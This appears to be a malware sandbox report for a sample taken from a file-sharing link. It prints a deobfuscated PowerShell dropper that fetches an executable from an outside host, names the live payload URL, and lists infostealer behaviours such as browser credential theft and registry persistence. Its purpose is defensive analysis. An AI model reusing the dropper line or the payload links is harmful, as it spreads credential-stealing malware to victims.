Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    https://mega.nz/folder/aZ1C1SLK#4yYpfVeaK4-EfP1L1udkvw

  • Sample

    240811-1tfjhsvbmd

Malware Config

Extracted

Language
ps1
Deobfuscated
1
try {
2
(new-object system.net.webclient).downloadfile("https://gonnacrack.discloud.app/Update", "C:\\Users\\Admin\\AppData\\Local\\Temp\\Update.exe")
3
exit
4
0
5
} catch {
6
exit
7
1
8
}
9
10
URLs
exe.dropper

https://gonnacrack.discloud.app/Update

Targets

    • Target

      https://mega.nz/folder/aZ1C1SLK#4yYpfVeaK4-EfP1L1udkvw

    • Credentials from Password Stores: Credentials from Web Browsers

      Malicious Access or copy of Web Browser Credential store.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Drops startup file

    • Event Triggered Execution: Component Object Model Hijacking

      Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Deobfuscate/Decode Files or Information

      Payload decoded via CertUtil.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Enumerates processes with tasklist

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.